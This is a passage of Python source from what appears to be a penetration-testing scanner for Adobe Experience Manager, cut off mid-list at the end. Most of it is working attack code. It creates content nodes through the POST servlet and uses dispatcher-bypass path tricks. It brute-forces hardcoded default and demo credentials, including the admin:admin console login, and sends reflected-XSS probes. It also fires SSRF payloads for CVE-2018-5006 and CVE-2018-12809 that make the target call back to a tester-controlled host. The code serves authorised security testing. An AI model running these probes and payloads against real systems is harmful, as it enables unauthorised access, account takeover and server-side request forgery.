    '<td>Parent Location</td>' is Sling's HTML success report.
    """
    # Intentionally shadows the module-level CREDS: only the two accounts
    # that can plausibly write to these paths are tried here.
    CREDS = ('admin:admin', 'author:author')
    nodename1 = random_string()
    r1 = random_string(3)
    POSTSERVLET1 = itertools.product(('/content/usergenerated/etc/commerce/smartlists/', '/content/usergenerated/'),
                                     ('*', '{0}.json', '{0}.1.json', '{0}.json/{1}.css', '{0}.json/{1}.html',
                                      '{0}.json/{1}.ico', '{0}.json/{1}.png', '{0}.json/{1}.1.json',
                                      '{0}.json;%0a{1}.css', '{0}.json;%0a{1}.html', '{0}.json;%0a{1}.png',
                                      '{0}.json;%0a{1}.ico', '{0}....4.2.1....json', '{0}?{1}.ico',
                                      '{0}?{1}.css', '{0}?{1}.html', '{0}?{1}.json', '{0}?{1}.1.json',
                                      '{0}?{1}....4.2.1....json'))
    POSTSERVLET1 = list('{0}{1}'.format(p1, p2.format(nodename1, r1)) for p1, p2 in POSTSERVLET1)
    nodename2 = random_string()
    r2 = random_string(3)
    POSTSERVLET2 = itertools.product(('/', '/content/', '/apps/', '/libs/'),
                                     ('*', '{0}.json', '{0}.1.json', '{0}.json/{1}.css',
                                      '{0}.json/{1}.html', '{0}.json/{1}.ico', '{0}.json/{1}.png',
                                      '{0}.json/{1}.1.json', '{0}.json;%0a{1}.css', '{0}.json;%0a{1}.html',
                                      '{0}.json;%0a{1}.png', '{0}.json;%0a{1}.ico', '{0}....4.2.1....json',
                                      '{0}?{1}.ico', '{0}?{1}.css', '{0}?{1}.html', '{0}?{1}.json',
                                      '{0}?{1}.1.json', '{0}?{1}....4.2.1....json'))
    POSTSERVLET2 = list('{0}{1}'.format(p1, p2.format(nodename2, r2)) for p1, p2 in POSTSERVLET2)
    results = []
    # Pass 1: anonymous POST to user-generated content paths.
    for path in POSTSERVLET1:
        url = normalize_url(base_url, path)
        try:
            headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
            resp = http_request(url, 'POST', additional_headers=headers, proxy=proxy)
            if '<td>Parent Location</td>' in str(resp.content) and resp.status_code in [200, 201]:
                f = Finding('CreateJCRNodes', url,
                            'It\'s possible to create new JCR nodes using POST Servlet as anonymous user. '
                            'You might get persistent XSS or perform other attack by accessing servlets registered by Resource Type.')
                results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='create_new_nodes', url=url)
    # Pass 2: authenticated POST with each default credential pair.
    for path, creds in itertools.product(POSTSERVLET2, CREDS):
        url = normalize_url(base_url, path)
        try:
            headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url,
                       'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
            data = 'a=b'
            resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy)
            if '<td>Parent Location</td>' in str(resp.content) and resp.status_code in [200, 201]:
                f = Finding('CreateJCRNodes', url,
                            'It\'s possible to create new JCR nodes using POST Servlet as "{0}" user. '
                            'You might get persistent XSS or RCE.'.format(creds))
                results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='create_new_nodes', url=url)
    return results
@register('create_new_nodes2')
def create_new_nodes2(base_url, my_host, debug=False, proxy=None):
    """Test JCR node creation inside Geometrixx users' home directories.

    Each default Geometrixx account posts under its own
    /home/users/geometrixx/<username>/ path (note the nested format: the
    path template's {0} is filled with the username per credential pair).
    """
    # Intentionally shadows the module-level CREDS: Geometrixx demo users only.
    CREDS = ('author:author', 'grios:password', 'aparker@geometrixx.info:aparker', 'jdoe@geometrixx.info:jdoe',
             'james.devore@spambob.com:password', 'matt.monroe@mailinator.com:password',
             'aaron.mcdonald@mailinator.com:password', 'jason.werner@dodgit.com:password')
    nodename = random_string()
    r = random_string(3)
    POSTSERVLET = itertools.product(('/home/users/geometrixx/{0}/', ),
                                    ('*', '{0}.json', '{0}.1.json', '{0}.json/{1}.css',
                                     '{0}.json/{1}.html', '{0}.json/{1}.ico', '{0}.json/{1}.png',
                                     '{0}.json/{1}.1.json', '{0}.json;%0a{1}.css', '{0}.json;%0a{1}.html',
                                     '{0}.json;%0a{1}.png', '{0}.json;%0a{1}.ico',
                                     '{0}....4.2.1....json', '{0}?{1}.ico', '{0}?{1}.css',
                                     '{0}?{1}.html', '{0}?{1}.json', '{0}?{1}.1.json',
                                     '{0}?{1}....4.2.1....json'))
    POSTSERVLET = list('{0}{1}'.format(p1, p2.format(nodename, r)) for p1, p2 in POSTSERVLET)
    results = []
    for path, creds in itertools.product(POSTSERVLET, CREDS):
        # Substitute the username portion of 'user:password' into the path.
        path = path.format(creds.split(':')[0])
        url = normalize_url(base_url, path)
        try:
            headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url,
                       'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
            data = 'a=b'
            resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy)
            if '<td>Parent Location</td>' in str(resp.content) and resp.status_code in [200, 201]:
                f = Finding('CreateJCRNodes 2', url,
                            'It\'s possible to create new JCR nodes using POST Servlet. As Geometrixx user "{0}". '
                            'You might get persistent XSS or perform other attack by accessing servlets registered by Resource Type.'.format(creds))
                results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='create_new_nodes2', url=url)
    return results
@register('loginstatus_servlet')
def exposed_loginstatus_servlet(base_url, my_host, debug=False, proxy=None):
    """Detect an exposed LoginStatusServlet, then bruteforce default creds.

    Any 200 response containing 'authenticated=' marks the servlet; for
    that URL every default credential pair is then tried, and
    'authenticated=true' confirms a working login.  The outer loop stops
    after the first responsive path variant.
    """
    global CREDS
    r = random_string(3)
    LOGINSTATUS = itertools.product(('/system/sling/loginstatus', '///system///sling///loginstatus'),
                                    ('.json', '.css', '.ico', '.png', '.gif', '.html', '.js', '.json/{0}.1.json',
                                     '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.png',
                                     '.json;%0a{0}.ico', '...4.2.1...json'))
    LOGINSTATUS = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in LOGINSTATUS)
    results = []
    for path in LOGINSTATUS:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)
            if resp.status_code == 200 and 'authenticated=' in str(resp.content):
                f = Finding('LoginStatusServlet', url,
                            'LoginStatusServlet is exposed, it allows to bruteforce credentials. '
                            'You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.')
                results.append(f)
                for creds in CREDS:
                    headers = {'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
                    resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)
                    if 'authenticated=true' in str(resp.content):
                        f = Finding('AEM with default credentials', url,
                                    'AEM with default credentials "{0}".'.format(creds))
                        results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_loginstatus_servlet', url=url)
    return results
# Check deliberately disabled (decorator commented out) -- kept for manual use.
#@register('currentuser_servlet')
def exposed_currentuser_servlet(base_url, my_host, debug=False, proxy=None):
    """Detect Granite's currentuser endpoint, then bruteforce default creds.

    A 200 response containing 'authorizableId' marks the endpoint; a
    credentialed response *not* containing 'anonymous' is taken as a
    successful login (weaker signal than loginstatus's authenticated=true).
    """
    global CREDS
    r = random_string(3)
    CURRENTUSER = itertools.product(('/libs/granite/security/currentuser', '///libs///granite///security///currentuser'),
                                    ('.json', '.css', '.ico', '.png', '.gif', '.html', '.js', '.json?{0}.css',
                                     '.json/{0}.1.json', '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.js',
                                     '.json;%0a{0}.ico', '...4.2.1...json'))
    CURRENTUSER = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CURRENTUSER)
    results = []
    for path in CURRENTUSER:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)
            if resp.status_code == 200 and 'authorizableId' in str(resp.content):
                f = Finding('CurrentUserServlet', url,
                            'CurrentUserServlet is exposed, it allows to bruteforce credentials. '
                            'You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.')
                results.append(f)
                for creds in CREDS:
                    headers = {'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
                    resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)
                    if 'anonymous' not in str(resp.content):
                        f = Finding('AEM with default credentials', url,
                                    'AEM with default credentials "{0}".'.format(creds))
                        results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_currentuser_servlet', url=url)
    return results
@register('userinfo_servlet')
def exposed_userinfo_servlet(base_url, my_host, debug=False, proxy=None):
    """Detect CQ's userinfo endpoint, then bruteforce default creds.

    A 200 response containing 'userID' marks the endpoint; a credentialed
    response *not* containing 'anonymous' is taken as a successful login.
    """
    global CREDS
    r = random_string(3)
    USERINFO = itertools.product(('/libs/cq/security/userinfo', '///libs///cq///security///userinfo'),
                                 ('.json', '.css', '.ico', '.png', '.gif', '.html', '.js',
                                  '.json?{0}.css', '.json/{0}.1.json',
                                  '.json;%0a{0}.css', '.json;%0a{0}.html',
                                  '.json;%0a{0}.ico', '...4.2.1...json'))
    USERINFO = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in USERINFO)
    results = []
    for path in USERINFO:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)
            if resp.status_code == 200 and 'userID' in str(resp.content):
                f = Finding('UserInfoServlet', url,
                            'UserInfoServlet is exposed, it allows to bruteforce credentials. '
                            'You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.')
                results.append(f)
                for creds in CREDS:
                    headers = {'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
                    resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)
                    if 'anonymous' not in str(resp.content):
                        f = Finding('AEM with default credentials', url,
                                    'AEM with default credentials "{0}".'.format(creds))
                        results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_userinfo_servlet', url=url)
    return results
@register('felix_console')
def exposed_felix_console(base_url, my_host, debug=False, proxy=None):
    """Detect a reachable Felix Web Console bundles page using admin:admin.

    'YWRtaW46YWRtaW4=' is base64 for 'admin:admin'; a 200 response titled
    'Web Console - Bundles' means OSGi bundles can be installed -> RCE.
    """
    r = random_string(3)
    FELIXCONSOLE = itertools.product(('/system/console/bundles', '///system///console///bundles'),
                                     ('', '.json', '.1.json', '.4.2.1...json', '.css', '.ico', '.png', '.gif', '.html', '.js',
                                      ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.png', '.json;%0a{0}.ico', '.servlet/{0}.css',
                                      '.servlet/{0}.js', '.servlet/{0}.html', '.servlet/{0}.ico'))
    FELIXCONSOLE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in FELIXCONSOLE)
    results = []
    for path in FELIXCONSOLE:
        url = normalize_url(base_url, path)
        headers = {'Authorization': 'Basic YWRtaW46YWRtaW4='}
        try:
            resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)
            if resp.status_code == 200 and 'Web Console - Bundles' in str(resp.content):
                f = Finding('FelixConsole', url,
                            'Felix Console is exposed, you may get RCE by installing OSGI bundle. '
                            'See - https://github.com/0ang3el/aem-rce-bundle')
                results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_felix_console', url=url)
    return results
@register('wcmdebug_filter')
def exposed_wcmdebug_filter(base_url, my_host, debug=False, proxy=None):
    """Detect the WCMDebugFilter (?debug=layout) -- CVE-2016-7882 XSS.

    Debug layout output contains 'res=' and 'sel=' markers when active.
    """
    r = random_string(3)
    WCMDEBUG = itertools.product(('/', '/content', '/content/dam'),
                                 ('.json', '.1.json', '...4.2.1...json', '.json/{0}.css',
                                  '.json/{0}.html', '.json/{0}.ico', '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.ico'),
                                 ('?debug=layout',))
    WCMDEBUG = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in WCMDEBUG)
    results = []
    for path in WCMDEBUG:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)
            if resp.status_code == 200 and 'res=' in str(resp.content) and 'sel=' in str(resp.content):
                f = Finding('WCMDebugFilter', url,
                            'WCMDebugFilter exposed and might be vulnerable to reflected XSS (CVE-2016-7882). '
                            'See - https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c')
                results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_wcmdebug_filter', url=url)
    return results
@register('wcmsuggestions_servlet')
def exposed_wcmsuggestions_servlet(base_url, my_host, debug=False, proxy=None):
    """Detect the contentfinder suggestions servlet (reflected XSS).

    The 'pre' parameter value '<1337abcdef>' coming back unescaped in a
    200 response proves the reflection.
    """
    r = random_string(3)
    WCMSUGGESTIONS = itertools.product(('/bin/wcm/contentfinder/connector/suggestions', '///bin///wcm///contentfinder///connector///suggestions'),
                                       ('.json', '.css', '.html', '.ico', '.png', '.gif', '.json/{0}.1.json',
                                        '.json;%0a{0}.css', '.json/{0}.css', '.json/{0}.ico',
                                        '.json/{0}.html', '...4.2.1...json'),
                                       ('?query_term=path%3a/&pre=<1337abcdef>&post=yyyy',))
    WCMSUGGESTIONS = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in WCMSUGGESTIONS)
    results = []
    for path in WCMSUGGESTIONS:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)
            if resp.status_code == 200 and '<1337abcdef>' in str(resp.content):
                f = Finding('WCMSuggestionsServlet', url,
                            'WCMSuggestionsServlet exposed and might result in reflected XSS. '
                            'See - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=96')
                results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_wcmsuggestions_servlet', url=url)
    return results
@register('crxde_crx')
def exposed_crxde_crx(base_url, my_host, debug=False, proxy=None):
    """Probe CRXDE Lite, CRX Explorer/Search/Namespace and Package Manager.

    Five payload families are chained into one scan; any page whose body
    matches one of the known UI markers is reported, then the loop stops.
    """
    r = random_string(3)
    CRXDELITE = itertools.product(('/crx/de/index.jsp', '///crx///de///index.jsp'),
                                  ('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.js', ';%0a{0}.ico', '?{0}.css',
                                   '?{0}.html', '?{0}.ico'))
    CRXDELITE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CRXDELITE)
    CRX = itertools.product(('/crx/explorer/browser/index.jsp', '///crx///explorer///browser///index.jsp'),
                            ('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico', '?{0}.css',
                             '?{0}.html', '?{0}.ico'))
    CRX = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CRX)
    CRXSEARCH = itertools.product(('/crx/explorer/ui/search.jsp', '/crx///explorer///ui///search.jsp'),
                                  ('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico',
                                   '?{0}.css', '?{0}.html', '?{0}.ico'))
    CRXSEARCH = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CRXSEARCH)
    CRXNAMESPACE = itertools.product(('/crx/explorer/ui/namespace_editor.jsp', '///crx/explorer///ui///namespace_editor.jsp'),
                                     ('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico', '?{0}.css',
                                      '?{0}.html', '?{0}.ico')
                                     )
    CRXNAMESPACE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CRXNAMESPACE)
    PACKMGR = itertools.product(('/crx/packmgr/index.jsp', '///crx///packmgr///index.jsp'),
                                ('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico',
                                 '?{0}.css', '?{0}.html', '?{0}.ico')
                                )
    PACKMGR = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in PACKMGR)
    results = []
    for path in itertools.chain(CRXDELITE, CRX, CRXSEARCH, CRXNAMESPACE, PACKMGR):
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)
            # UI title/marker strings identifying each of the five consoles.
            if resp.status_code == 200 and ('CRXDE Lite' in str(resp.content) or 'Content Explorer' in str(resp.content) or
                                            'CRX Package Manager' in str(resp.content) or 'Search for:' in str(resp.content) or
                                            'Namespace URI' in str(resp.content)) :
                f = Finding('CRXDE Lite/CRX', url, 'Sensitive information might be exposed. Check manually.')
                results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_crxde_crx', url=url)
    return results
# Check deliberately disabled (decorator commented out) -- kept for manual use.
#@register('reports')
def exposed_reports(base_url, my_host, debug=False, proxy=None):
    """Detect an exposed disk-usage report page under /etc/reports."""
    r = random_string(3)
    DISKUSAGE = itertools.product(('/etc/reports/diskusage.html', '///etc/reports///diskusage.html'),
                                  ('/{0}.css', '/{0}.ico', ';%0a{0}.css', ';%0a{0}.ico'))
    DISKUSAGE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in DISKUSAGE)
    results = []
    for path in DISKUSAGE:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)
            if resp.status_code == 200 and ('Disk Usage' in str(resp.content)):
                f = Finding('Disk Usage report', url, 'Disk Usage report are exposed.')
                results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_reports', url=url)
    return results
@register('salesforcesecret_servlet')
def ssrf_salesforcesecret_servlet(base_url, my_host, debug=False, proxy=None):
    """Detect SSRF via SalesforceSecretServlet (CVE-2018-5006).

    Each payload points the servlet's authorization_url/instance_url at our
    Detector callback server; the triggering URL is base16-encoded into the
    callback path so the vulnerable endpoint can be recovered from the
    shared detections dict ``d`` afterwards.
    """
    global token, d
    results = []
    # Variant 1: plain selector/extension suffixes appended to the servlet path.
    SALESFORCESERVLET1 = itertools.product(
        (
            '/libs/mcm/salesforce/customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
            '///libs///mcm///salesforce///customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
            '/libs/mcm/salesforce/customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23',
            '///libs///mcm///salesforce///customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23'
        ),
        (
            '.json', '.1.json', '.4.2.1...json', '.html'
        )
    )
    SALESFORCESERVLET1 = list(pair[0].format(pair[1]) for pair in SALESFORCESERVLET1)
    # Variant 2: dispatcher-confusion suffixes with a random cache-buster string.
    SALESFORCESERVLET2 = itertools.product(
        (
            '/libs/mcm/salesforce/customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
            '///libs///mcm///salesforce///customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
            '/libs/mcm/salesforce/customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23',
            '///libs///mcm///salesforce///customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23'
        ),
        (
            '.html/{0}.1.json', '.html/{0}.4.2.1...json', '.html/{0}.css', '.html/{0}.js', '.html/{0}.png', '.html/{0}.bmp',
            '.html;%0a{0}.css', '.html;%0a{0}.js', '.json;%0a{0}.css', '.html;%0a{0}.png', '.json;%0a{0}.png',
            '.json;%0a{0}.html', '.json/{0}.css', '.json/{0}.js', '.json/{0}.png', '.json/a.gif', '.json/{0}.ico', '.json/{0}.html'
        )
    )
    cache_buster = random_string()
    SALESFORCESERVLET2 = list(pair[0].format(pair[1].format(cache_buster)) for pair in SALESFORCESERVLET2)
    # Variant 3: numeric-selector suffixes with a random integer cache-buster.
    SALESFORCESERVLET3 = itertools.product(
        (
            '/libs/mcm/salesforce/customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
            '///libs///mcm///salesforce///customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
            '/libs/mcm/salesforce/customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23',
            '///libs///mcm///salesforce///customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23'
        ),
        (
            '.{0}.css', '.{0}.js', '.{0}.png', '.{0}.ico', '.{0}.bmp', '.{0}.gif', '.{0}.html'
        )
    )
    cache_buster = randint(1, 2**12)
    SALESFORCESERVLET3 = list(pair[0].format(pair[1].format(cache_buster)) for pair in SALESFORCESERVLET3)
    for path in itertools.chain(SALESFORCESERVLET1, SALESFORCESERVLET2, SALESFORCESERVLET3):
        url = normalize_url(base_url, path)
        # Encode the triggering URL into the callback path so a hit on the
        # Detector can be traced back to the exact vulnerable request.
        encoded_orig_url = (base64.b16encode(url.encode())).decode()
        back_url = 'http://{0}/{1}/salesforcesecret/{2}/'.format(my_host, token, encoded_orig_url)
        url = url.format(back_url)
        try:
            http_request(url, proxy=proxy, debug=debug)
        except:
            if debug:
                error('Exception while performing a check', check='ssrf_salesforcesecret_servlet', url=url)
    # Give in-flight server-side requests time to reach the callback server.
    time.sleep(10)
    if 'salesforcesecret' in d:
        u = base64.b16decode(d.get('salesforcesecret')[0]).decode()
        f = Finding('SalesforceSecretServlet', u,
                    'SSRF via SalesforceSecretServlet (CVE-2018-5006) was detected. '
                    'See - https://helpx.adobe.com/security/products/experience-manager/apsb18-23.html')
        results.append(f)
    return results
@register('reportingservices_servlet')
def ssrf_reportingservices_servlet(base_url, my_host, debug=False, proxy=None):
    """Probe for SSRF via the ReportingServicesProxyServlet (CVE-2018-12809).

    Every candidate path embeds a back-connect URL pointing at our callback
    listener; when the target fetches it, the callback handler stores the hit
    in the global dict ``d`` under the 'reportingservices' key, from which the
    originally probed URL is recovered (base16-decoded).

    :param base_url: base URL of the AEM instance under test
    :param my_host: host:port of our callback listener
    :param debug: when True, log exceptions raised by individual requests
    :param proxy: optional proxy passed through to http_request
    :return: list with a single Finding when the SSRF fired, else empty list
    """
    global token, d
    results = []
    # Plain servlet paths, including dispatcher-bypass /// variants.
    REPORTINGSERVICESSERVLET1 = (
        '/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet?url={0}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.json?url={0}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.4.2.1...json?url={0}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.1.json?url={0}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/content/proxy.reportingservices.json?url={0}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/content/proxy.reportingservices.4.2.1...json?url={0}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/content/proxy.reportingservices.1.json?url={0}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet?url={0}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.json?url={0}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.4.2.1...json?url={0}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.1.json?url={0}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///proxy///reportingservices.json?url={0}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///proxy///reportingservices.4.2.1...json?url={0}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///proxy///reportingservices.1.json?url={0}%23/api1.omniture.com/a&q=a'
    )
    # Variants carrying a random-string cache buster in the suffix selector.
    REPORTINGSERVICESSERVLET2 = (
        '/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.gif?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.bmp?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq/contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq/contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.gif?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.png?url={{0}}%23/api1.omniture.com/a&q=a'
    )
    cache_buster = random_string()
    REPORTINGSERVICESSERVLET2 = (path.format(cache_buster) for path in REPORTINGSERVICESSERVLET2)
    # Selector-style variants with a numeric cache buster.
    REPORTINGSERVICESSERVLET3 = (
        '/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
        '/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.bmp?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
        '///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.bmp?url={{0}}%23/api1.omniture.com/a&q=a',
